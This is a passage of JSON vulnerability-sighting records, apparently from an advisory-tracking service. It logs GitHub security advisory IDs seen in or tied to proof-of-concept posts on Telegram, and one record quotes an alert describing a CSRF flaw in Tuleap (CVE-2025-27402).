"GHSA-M5QP-6W8W-W647", "type": "published-proof-of-concept", "source": "Telegram/xP_pZj4ci_bcCYqgi-T_PIS6ijPmmH3NCtwSFt5Cz1eCFxQ", "content": "", "creation_timestamp": "2026-04-04T05:16:04.000000Z"}, {"uuid": "98b3b1a0-0426-47fa-89b8-2f7c17d7e41e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-66PG-CPJF-2MFG", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/6396", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27402\n\ud83d\udd25 CVSS Score: 4.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:L)\n\ud83d\udd39 Description: Tuleap is an Open Source Suite to improve management of software developments and collaboration. Tuleap is missing CSRF protections on tracker fields administrative operations. An attacker could use this vulnerability to trick victims into removing or updating tracker fields. This vulnerability is fixed in Tuleap Community Edition 16.4.99.1740414959 and Tuleap Enterprise Edition 16.4-6 and 16.3-11.\n\ud83d\udccf Published: 2025-03-04T17:00:49.077Z\n\ud83d\udccf Modified: 2025-03-04T17:17:56.708Z\n\ud83d\udd17 References:\n1. https://github.com/Enalean/tuleap/security/advisories/GHSA-66pg-cpjf-2mfg\n2. https://github.com/Enalean/tuleap/commit/ea6319e2ad40beeda335af4ccd7a204a6912765c\n3. https://tuleap.net/plugins/tracker/?aid=41857", "creation_timestamp": "2025-03-04T17:34:06.000000Z"}, {"uuid": "973747d6-64f5-454c-85fa-99b2a1c961cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WCXR-59V9-RXR8", "type": "published-proof-of-concept", "source": "Telegram/cXzVIGK7PQfwtmMw_RkRYvJTJsFs-s6Ys2jSidGnYSoPd-U", "content": "", "creation_timestamp": "2026-03-29T15:19:56.000000Z"}, {"uuid": "52ad4b9a-0da6-41a2-a007-b05272cf73d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G353-MGV3-8PCJ", "type": "seen", "source": "Telegram/bOji7_uFGKpjQ-Vv3CFZvWqxNHLg4F03MY6E5pxai3iB8W0", "content": "", "creation_timestamp": "2026-03-29T15:20:09.000000Z"}, {"uuid": "9a6e53c0-b2aa-47c2-8217-f84207f0c52a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C83F-3XP6-HFCP", "type": "seen", "source": "Telegram/hICGoMiiTAfNGiGPS6kLuEIjx0Cnqs2qprpkS-tW4S4edfo", "content": "", "creation_timestamp": "2026-03-30T17:22:57.000000Z"}, {"uuid": "cad216cc-5870-48d4-b756-879476ab7467", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2GMJ-RPQF-PXVH", "type": "seen", "source": "Telegram/3uob0OgNXCPySF5ZgiHiYbQAvLr6RIUarGC854yFCH2MAgQ", "content": "", "creation_timestamp": "2026-03-30T21:21:40.000000Z"}, {"uuid": "95892f22-0d91-4fcd-a4e8-542afffd4894", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M62J-GWM9-7P8M", "type": "published-proof-of-concept", "source": "Telegram/BUI_3SEyOfGtUgM1Z1U1o2mGpepftA8GfZph5NShzoYe3c8", "content": "", "creation_timestamp": "2026-03-30T21:21:54.000000Z"}, {"uuid": "927b6d27-11e5-4e80-a6c0-6b31ad19253f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-55QG-VVGJ-FFH4", "type": "seen", "source": "Telegram/qLRVxcBpXT_mPFtTmfhugZI-eibNxK7vt9WwygicfOox0-Q", "content": "", "creation_timestamp": "2026-03-30T23:20:18.000000Z"}, {"uuid": "728904b5-8117-4d29-ac31-5c31b9cc5152", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7JJ6-4R42-W9H6", "type": "seen", "source": "Telegram/qLRVxcBpXT_mPFtTmfhugZI-eibNxK7vt9WwygicfOox0-Q", "content": "", "creation_timestamp": "2026-03-30T23:20:18.000000Z"}, {"uuid": "19b7ae18-e53c-4e6e-9852-0c54e8ed93ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QH6H-P6C9-FF54", "type": "seen", "source": "Telegram/62pZ0M7EEU9QzqUpq3hJFXhFPR-ebrkyPJ1cBwC7xQpoTU0", "content": "", "creation_timestamp": "2026-03-31T05:17:42.000000Z"}, {"uuid": "8233a44a-47f4-4d10-9acd-56ffc0d6305f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C4R5-FXQW-VH93", "type": "seen", "source": "Telegram/62pZ0M7EEU9QzqUpq3hJFXhFPR-ebrkyPJ1cBwC7xQpoTU0", "content": "", "creation_timestamp": "2026-03-31T05:17:42.000000Z"}, {"uuid": "714b7587-3b34-4d60-8333-2354249df5c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XMGR-9PQC-H5VW", "type": "seen", "source": "Telegram/62pZ0M7EEU9QzqUpq3hJFXhFPR-ebrkyPJ1cBwC7xQpoTU0", "content": "", "creation_timestamp": "2026-03-31T05:17:42.000000Z"}, {"uuid": "010cd654-6605-4733-81f5-d268aa1f240d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X34H-54CW-9825", "type": "seen", "source": "Telegram/62pZ0M7EEU9QzqUpq3hJFXhFPR-ebrkyPJ1cBwC7xQpoTU0", "content": "", "creation_timestamp": "2026-03-31T05:17:42.000000Z"}, {"uuid": "f4a1c822-94cc-4104-bd15-a8ff695158af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RW39-5899-8MXP", "type": "published-proof-of-concept", "source": "Telegram/bc0dtnMAVwN1UZgcMoKZPcvjFdUYL45B0PcMRVU30Ps4cSo", "content": "", "creation_timestamp": "2026-03-31T13:19:26.000000Z"}, {"uuid": "5915ab3d-685a-4adb-8f9e-353d5e8c43aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XWCJ-HWHF-H378", "type": "published-proof-of-concept", "source": "Telegram/bc0dtnMAVwN1UZgcMoKZPcvjFdUYL45B0PcMRVU30Ps4cSo", "content": "", "creation_timestamp": "2026-03-31T13:19:26.000000Z"}, {"uuid": "f4ccb79c-2631-4dce-bdf3-61229a57ea55", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G7CR-9H7Q-4QXQ", "type": "published-proof-of-concept", "source": "Telegram/bc0dtnMAVwN1UZgcMoKZPcvjFdUYL45B0PcMRVU30Ps4cSo", "content": "", "creation_timestamp": "2026-03-31T13:19:26.000000Z"}, {"uuid": "867e8b34-5ad6-4e8d-ad48-cfed72ad9315", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MJ4P-RC52-M843", "type": "published-proof-of-concept", "source": "Telegram/bc0dtnMAVwN1UZgcMoKZPcvjFdUYL45B0PcMRVU30Ps4cSo", "content": "", "creation_timestamp": "2026-03-31T13:19:26.000000Z"}, {"uuid": "28472636-b90d-4ca7-befb-47c6d234c77f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WPXJ-VHFP-HHVM", "type": "seen", "source": "Telegram/knkV6U7RC4OpKxR0GhJKoJS2C9Z__Lnhn5rNmC0CAguDvjk", "content": "", "creation_timestamp": "2026-03-26T21:36:49.000000Z"}, {"uuid": "111371eb-7208-487f-bfcb-92ab1745ac73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M8J2-VFMQ-P6QG", "type": "seen", "source": "Telegram/knkV6U7RC4OpKxR0GhJKoJS2C9Z__Lnhn5rNmC0CAguDvjk", "content": "", "creation_timestamp": "2026-03-26T21:36:49.000000Z"}, {"uuid": "556a9a27-1a35-4d44-be7f-144b318c0fc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-25F8-8CJ2-M887", "type": "seen", "source": "Telegram/knkV6U7RC4OpKxR0GhJKoJS2C9Z__Lnhn5rNmC0CAguDvjk", "content": "", "creation_timestamp": "2026-03-26T21:36:49.000000Z"}, {"uuid": "1f40941c-179e-4d41-ad56-3b790599a586", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3WJR-6GW8-9J22", "type": "seen", "source": "Telegram/knkV6U7RC4OpKxR0GhJKoJS2C9Z__Lnhn5rNmC0CAguDvjk", "content": "", "creation_timestamp": "2026-03-26T21:36:49.000000Z"}, {"uuid": "4b3e0197-406b-41c8-8fd3-5cc0d9f2d775", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJWV-57XH-XR6R", "type": "seen", "source": "Telegram/qLRVxcBpXT_mPFtTmfhugZI-eibNxK7vt9WwygicfOox0-Q", "content": "", "creation_timestamp": "2026-03-30T23:20:18.000000Z"}, {"uuid": "06382fac-444a-48ff-84ec-9a3ccb4e7632", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:2106", "type": "seen", "source": "Telegram/8zEAgaRSdVOPVh8YiiaVjapuYDuCzrad_OizJ-8M58UocKc", "content": "", "creation_timestamp": "2026-03-26T23:20:03.000000Z"}, {"uuid": "7453b93d-18cc-455b-aebf-4a6ffdc6c802", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JJP7-G2JW-WH3J", "type": "seen", "source": "Telegram/67MCm8uvWkL1PFFVLqu-Ae9nhYuAfQmsKMFjCSOu4hiA4mc", "content": "", "creation_timestamp": "2026-03-27T01:18:53.000000Z"}, {"uuid": "3b30b6a6-a7f6-473b-af27-3eb233f31ca2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8Q8J-MM3G-5C2Q", "type": "seen", "source": "Telegram/9UoOc_Mml4hO1LPqEQWig8KjS1ZNRBXJeCq-u3-UaU0LNh0", "content": "", "creation_timestamp": "2026-03-27T23:27:55.000000Z"}, {"uuid": "c646e9bb-2a92-4050-aa95-bf5977462f16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XHPV-HC6G-R9C6", "type": "seen", "source": "Telegram/oIt8DGorr8cyCUyQDoJ69KF18sDdBCT7_fq8G95rr4FMqvI", "content": "", "creation_timestamp": "2026-03-30T10:01:09.000000Z"}, {"uuid": "bab8be9b-a9a7-4867-81d7-2ed78bbedf53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W4GP-FJGQ-3Q4G", "type": "published-proof-of-concept", "source": "Telegram/Y8kzkrSdzd2cmfNdKzxY7235NQsCILSeJh1PyUoA-eHkPkg", "content": "", "creation_timestamp": "2026-03-27T23:28:45.000000Z"}, {"uuid": "45d853b5-15de-4836-8592-9a73ee88b996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3P2M-H2V6-G9MX", "type": "published-proof-of-concept", "source": "Telegram/Y8kzkrSdzd2cmfNdKzxY7235NQsCILSeJh1PyUoA-eHkPkg", "content": "", "creation_timestamp": "2026-03-27T23:28:45.000000Z"}, {"uuid": "e89a0625-2ed1-489f-9d47-1ae4a73fae13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QX3G-5G22-FQ5W", "type": "seen", "source": "Telegram/DQ8Phmkx05Q1rHpnB8sJ1vhC9dSxcFzzTf0RtJAOAn3w7JQ", "content": "", "creation_timestamp": "2026-03-28T01:18:50.000000Z"}, {"uuid": "0acbc76e-1d9e-43b1-a494-ed9dd0bc258c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M74M-F7CR-432X", "type": "seen", "source": "Telegram/DQ8Phmkx05Q1rHpnB8sJ1vhC9dSxcFzzTf0RtJAOAn3w7JQ", "content": "", "creation_timestamp": "2026-03-28T01:18:50.000000Z"}, {"uuid": "08b25422-76a8-4552-9c54-93d0bdf4d13c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-74XM-6WGF-X37J", "type": "seen", "source": "Telegram/DQ8Phmkx05Q1rHpnB8sJ1vhC9dSxcFzzTf0RtJAOAn3w7JQ", "content": "", "creation_timestamp": "2026-03-28T01:18:50.000000Z"}, {"uuid": "b693bc10-9740-4f1e-9dd0-67ad95b410db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5HF2-VHJ6-GJ9M", "type": "published-proof-of-concept", "source": "Telegram/fjirMqbI7HbDe3OLZhJWgKP9i_Qtg8z94oAYRFGU8rTUaV0", "content": "", "creation_timestamp": "2026-03-30T19:17:51.000000Z"}, {"uuid": "5dfa2063-ac75-48fb-ba2f-6234f7b5de07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V8VP-X4Q4-2VCH", "type": "seen", "source": "Telegram/qLRVxcBpXT_mPFtTmfhugZI-eibNxK7vt9WwygicfOox0-Q", "content": "", "creation_timestamp": "2026-03-30T23:20:18.000000Z"}, {"uuid": "67a6d405-4924-4221-9bca-f2df6bc54547", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PX3P-VGH9-M57C", "type": "published-proof-of-concept", "source": "Telegram/glZc2MUrWDW1orrk5KZxOV-1RuNHXXM8No2M1-1_yJOvNvE", "content": "", "creation_timestamp": "2026-03-31T15:18:14.000000Z"}, {"uuid": "9f7029d6-4a86-4abe-b218-460b019a0de0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GQ54-J8F4-XJ8C", "type": "published-proof-of-concept", "source": "Telegram/glZc2MUrWDW1orrk5KZxOV-1RuNHXXM8No2M1-1_yJOvNvE", "content": "", "creation_timestamp": "2026-03-31T15:18:14.000000Z"}, {"uuid": "638dcc47-2460-4b9e-bac1-cbd925cc6a57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V2V2-F783-358J", "type": "published-proof-of-concept", "source": "Telegram/Ig1ee0N1HBlXVPi52hAEKt2Zoza8gFtrDIgi8zasU7_Bxz8", "content": "", "creation_timestamp": "2026-03-31T17:24:40.000000Z"}, {"uuid": "f11fdcb0-9efa-43da-8b43-3f6f43d150b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2X4X-CC5G-QMMG", "type": "published-proof-of-concept", "source": "Telegram/Ig1ee0N1HBlXVPi52hAEKt2Zoza8gFtrDIgi8zasU7_Bxz8", "content": "", "creation_timestamp": "2026-03-31T17:24:40.000000Z"}, {"uuid": "22df06ba-5271-4ca6-be65-19bf64525d1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CPJ3-3R2F-XJ59", "type": "published-proof-of-concept", "source": "Telegram/pyEIr0Ko2hoCavwas1rlZ1K5Q5ZdrBNaOpK3idLXyAytNFs", "content": "", "creation_timestamp": "2026-03-27T17:22:52.000000Z"}, {"uuid": "a07b08cf-106b-48ba-83c4-198becb47ca1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QFC3-HM4J-7Q77", "type": "seen", "source": "Telegram/HCzuKY5MuLPsfo_EI5S3ks6iQFEX7xEFL0kHnLhrHZ36Sb0", "content": "", "creation_timestamp": "2026-03-27T21:22:34.000000Z"}, {"uuid": "e09226d3-b214-4312-82ed-c2ddaa085fa1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-828H-5X96-RQX7", "type": "published-proof-of-concept", "source": "Telegram/B1-lnNSHpl_GL4tzlck3EB0WXwjfJllp4cXItiyc0oKB0vU", "content": "", "creation_timestamp": "2026-03-27T21:23:14.000000Z"}, {"uuid": "c32400f6-3ef1-41af-bda6-68f021045e99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RWCR-RPCC-3G9M", "type": "published-proof-of-concept", "source": "Telegram/B1-lnNSHpl_GL4tzlck3EB0WXwjfJllp4cXItiyc0oKB0vU", "content": "", "creation_timestamp": "2026-03-27T21:23:14.000000Z"}, {"uuid": "ff60206e-08e4-4c8b-9e2c-7941ee3b8ea6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QXMC-6F24-G86G", "type": "published-proof-of-concept", "source": "Telegram/bbla1pabQ6PMuVKeZ-DwTmBlqOcXGSdR93YlyGpOXR1ezik", "content": "", "creation_timestamp": "2026-03-31T03:17:00.000000Z"}, {"uuid": "796e0ba8-f79f-46d8-b668-cd3ed781989d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M9G7-RGFC-JCM7", "type": "published-proof-of-concept", "source": "Telegram/bbla1pabQ6PMuVKeZ-DwTmBlqOcXGSdR93YlyGpOXR1ezik", "content": "", "creation_timestamp": "2026-03-31T03:17:00.000000Z"}, {"uuid": "4ad7143a-043c-414f-ac7a-0bece02a0b78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6HPG-8RX3-CWGV", "type": "published-proof-of-concept", "source": "Telegram/bbla1pabQ6PMuVKeZ-DwTmBlqOcXGSdR93YlyGpOXR1ezik", "content": "", "creation_timestamp": "2026-03-31T03:17:00.000000Z"}, {"uuid": "599d9eb4-c511-4048-adb5-73e1f86cc042", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-63CF-662X-CRP2", "type": "seen", "source": "Telegram/wovzpCQvp7hlTQxwTsDEYFJDESQHFA6mVe176dFHuk85of0", "content": "", "creation_timestamp": "2026-03-27T03:18:12.000000Z"}, {"uuid": "9a4e3f57-f51d-466d-b9be-085df7de7bd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JFJG-VC52-WQVF", "type": "seen", "source": "Telegram/wovzpCQvp7hlTQxwTsDEYFJDESQHFA6mVe176dFHuk85of0", "content": "", "creation_timestamp": "2026-03-27T03:18:12.000000Z"}, {"uuid": "138c7e5e-1793-4328-b75a-ca7f77363526", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6HRP-7FQ9-3QV2", "type": "seen", "source": "Telegram/wovzpCQvp7hlTQxwTsDEYFJDESQHFA6mVe176dFHuk85of0", "content": "", "creation_timestamp": "2026-03-27T03:18:12.000000Z"}, {"uuid": "73f04759-44e8-4836-b9bc-334366a45685", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-378W-XH68-QRC8", "type": "seen", "source": "Telegram/wovzpCQvp7hlTQxwTsDEYFJDESQHFA6mVe176dFHuk85of0", "content": "", "creation_timestamp": "2026-03-27T03:18:12.000000Z"}, {"uuid": "a9278eed-2805-497d-8cb4-1cd0a1830844", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4C29-8RGM-JVJJ", "type": "seen", "source": "Telegram/wovzpCQvp7hlTQxwTsDEYFJDESQHFA6mVe176dFHuk85of0", "content": "", "creation_timestamp": "2026-03-27T03:18:12.000000Z"}, {"uuid": "6357a80a-5e48-4550-beaa-50de1d13a4f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GH5M-4M97-C95H", "type": "published-proof-of-concept", "source": "Telegram/wWPS0byCXjzJleEHKN6yjldptusIbQ1L7WvvuLFtEg9AE-Q", "content": "", "creation_timestamp": "2026-03-27T21:23:25.000000Z"}, {"uuid": "a1512c9e-508f-4111-bf6a-9a50a90990cb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-95MG-WPQW-9QXH", "type": "published-proof-of-concept", "source": "Telegram/BUI_3SEyOfGtUgM1Z1U1o2mGpepftA8GfZph5NShzoYe3c8", "content": "", "creation_timestamp": "2026-03-30T21:21:54.000000Z"}, {"uuid": "d53ac35c-bb33-4760-b66d-88457d5fc794", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XP55-2PF4-FV8M", "type": "published-proof-of-concept", "source": "Telegram/BUI_3SEyOfGtUgM1Z1U1o2mGpepftA8GfZph5NShzoYe3c8", "content": "", "creation_timestamp": "2026-03-30T21:21:54.000000Z"}, {"uuid": "e6c9cdc1-e2bb-429d-bb9a-5b87a73437f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FHH2-GG7W-GWPQ", "type": "published-proof-of-concept", "source": "Telegram/BUI_3SEyOfGtUgM1Z1U1o2mGpepftA8GfZph5NShzoYe3c8", "content": "", "creation_timestamp": "2026-03-30T21:21:54.000000Z"}, {"uuid": "09b1620c-8b24-48ab-8e5b-f8fe872ffef3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P322-V6VW-VRQ9", "type": "seen", "source": "Telegram/62pZ0M7EEU9QzqUpq3hJFXhFPR-ebrkyPJ1cBwC7xQpoTU0", "content": "", "creation_timestamp": "2026-03-31T05:17:42.000000Z"}, {"uuid": "21d7fa8b-d4f3-4b61-b32a-3b8e4c271d80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2PR2-HCV6-7GWV", "type": "published-proof-of-concept", "source": "Telegram/8fg0KLkYs5GajJfSXrDS4tPEJWoPqz7hAHWCZfIaMeJCUv0", "content": "", "creation_timestamp": "2026-03-31T17:25:34.000000Z"}, {"uuid": "577cccba-fefa-4dc4-be8d-6f3538205b17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3VMH-33XR-9CQH", "type": "published-proof-of-concept", "source": "Telegram/8fg0KLkYs5GajJfSXrDS4tPEJWoPqz7hAHWCZfIaMeJCUv0", "content": "", "creation_timestamp": "2026-03-31T17:25:34.000000Z"}, {"uuid": "e6a8f5d7-efa3-4915-915a-a77ca39d6c9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-M983-V2FF-WQ65", "type": "published-proof-of-concept", "source": "Telegram/8fg0KLkYs5GajJfSXrDS4tPEJWoPqz7hAHWCZfIaMeJCUv0", "content": "", "creation_timestamp": "2026-03-31T17:25:34.000000Z"}, {"uuid": "6f1a33da-a571-4a35-8f4e-31d97bcf4570", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X27P-5F68-M644", "type": "published-proof-of-concept", "source": "Telegram/8fg0KLkYs5GajJfSXrDS4tPEJWoPqz7hAHWCZfIaMeJCUv0", "content": "", "creation_timestamp": "2026-03-31T17:25:34.000000Z"}, {"uuid": "fe8510e2-241a-4cff-86b0-44bd5c4306cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3GC4-5993-C2QC", "type": "seen", "source": "Telegram/j4uk2-mJi_13Bei6kQkbjOgrQjosCkJncfaGDNG1RowRYM4", "content": "", "creation_timestamp": "2026-03-27T17:22:30.000000Z"}, {"uuid": "bf98e81b-3d3d-41e2-9176-4eed46ca42b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3P4-M74F-43G6", "type": "seen", "source": "Telegram/j4uk2-mJi_13Bei6kQkbjOgrQjosCkJncfaGDNG1RowRYM4", "content": "", "creation_timestamp": "2026-03-27T17:22:30.000000Z"}, {"uuid": "19c54a50-5674-4339-8210-07ed5acd37a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7Q7G-X6VG-XPC3", "type": "seen", "source": "Telegram/j4uk2-mJi_13Bei6kQkbjOgrQjosCkJncfaGDNG1RowRYM4", "content": "", "creation_timestamp": "2026-03-27T17:22:30.000000Z"}, {"uuid": "a9489f3b-9fc0-411e-b488-fac6a2543975", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4VRQ-3VRQ-G6GG", "type": "seen", "source": "Telegram/j4uk2-mJi_13Bei6kQkbjOgrQjosCkJncfaGDNG1RowRYM4", "content": "", "creation_timestamp": "2026-03-27T17:22:30.000000Z"}, {"uuid": "0fc814a7-ecf0-4696-bc9a-2df4df4deb45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5M6Q-G25R-MVWX", "type": "seen", "source": "Telegram/9UoOc_Mml4hO1LPqEQWig8KjS1ZNRBXJeCq-u3-UaU0LNh0", "content": "", "creation_timestamp": "2026-03-27T23:27:55.000000Z"}, {"uuid": 